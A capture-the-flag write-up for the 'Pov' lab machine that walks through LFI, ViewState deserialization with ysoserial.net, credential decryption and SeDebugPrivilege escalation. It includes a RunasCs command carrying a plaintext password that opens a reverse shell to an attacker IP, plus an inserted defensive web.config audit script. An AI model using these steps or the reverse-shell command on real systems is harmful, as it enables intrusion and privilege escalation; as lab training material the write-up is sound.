WRITE-UP FOR Pov – solved on 02/02/2024



First of all, we do a little bit of scanning and configure /etc/hosts.


Looking around the website, we cannot find anything.


It’s time to run gobuster in dir and vhost modes.


Hurray, we find dev.pov.htb.


After looking around a little, it’s time to use Burp Suite. I found that the download function seems intriguing.


Nothing useful on the contact page.


Now we know the page uses ASP.NET version 4.0.30319. Surfing the Internet, I found something useful. Follow the links for more info =)


https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/

https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter


Okay, it seems that we have to exploit the LFI together with the VIEWSTATE value. Retrieve the /web.config file as described in the instructions.



Now we have the machineKey. Just try ysoserial.net.



https://github.com/pwntester/ysoserial.net?tab=readme-ov-file
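From the defender’s side, the reason this works is that a static machineKey sitting in web.config (readable through the LFI) lets anyone sign ViewState. Below is an added example, not part of the write-up or of any tool above, that audits a web.config for the settings behind this attack; the sample config and its key material are constructed placeholders.

```python
"""Audit an ASP.NET web.config for ViewState-related weaknesses (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample resembling a vulnerable web.config; keys are placeholders.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="true" targetFramework="4.0" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>
"""


def audit_web_config(xml_text):
    """Return a list of human-readable findings for the given web.config text."""
    findings = []
    root = ET.fromstring(xml_text)
    web = root.find("system.web")
    if web is None:
        return findings
    mk = web.find("machineKey")
    if mk is not None:
        # Static keys in the file mean whoever can read it (e.g. via an
        # arbitrary file read) can forge a correctly signed ViewState.
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if not value.startswith("AutoGenerate"):
                findings.append(f"static {attr} stored in web.config")
        # Flag legacy hash algorithms for the ViewState MAC.
        if mk.get("validation", "").upper() in ("MD5", "SHA1"):
            findings.append(f"weak validation algorithm {mk.get('validation')}")
    pages = web.find("pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("ViewState MAC disabled (enableViewStateMac=false)")
    comp = web.find("compilation")
    if comp is not None and comp.get("debug", "false").lower() == "true":
        findings.append("compilation debug=true (verbose errors leak internals)")
    return findings


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print("[!]", finding)
```

Once a machineKey is known to have leaked, the fix is to rotate it (and keep ViewState MAC enabled), since the attack needs nothing beyond the key material.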


Finally, inject the payload into the VIEWSTATE value we found before.


The moment has come: I got the reverse shell as expected.



Looking around the system, I found some credentials in connection.xml.


After some googling, it seems to be a credential object exported by PowerShell. I decrypted it.



https://stackoverflow.com/questions/63639876/powershell-password-decrypt


All right, now we have credentials for the user alaading.



Now I was stuck. By continuing to search, I found a file called RunasCs. I searched the Internet, and well …, it can help a lot.


https://github.com/antonioCoco/RunasCs


Now use the application to get a second reverse shell on port 4444 as the user alaading.


Searching around gave me user.txt, easy as cake!!



Looking at the RunasCs docs, I found that I can get even more privileges by adding --bypass-u

.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.177:5555 --bypass-u


Now we have SeDebugPrivilege. Searching the Internet, I found that I can escalate privileges with this =>>>


The idea is to send a payload that gives a reverse TCP Meterpreter shell using Metasploit.

I won’t write any comments under the next few pictures, so if you don’t understand what I’m doing, try these docs at the DLL hijacking section; it’s quite similar (just use an executable payload instead of a .dll file).

https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/


ALRIGHT, I’m back. Now we have the reverse shell in Metasploit. To escalate privileges, we migrate to winlogon.exe.

Run ps to list all running processes.


Find winlogon.exe and migrate using its PID.



Get the shell and everything is done.


Good job!!! See you on another machine, bro.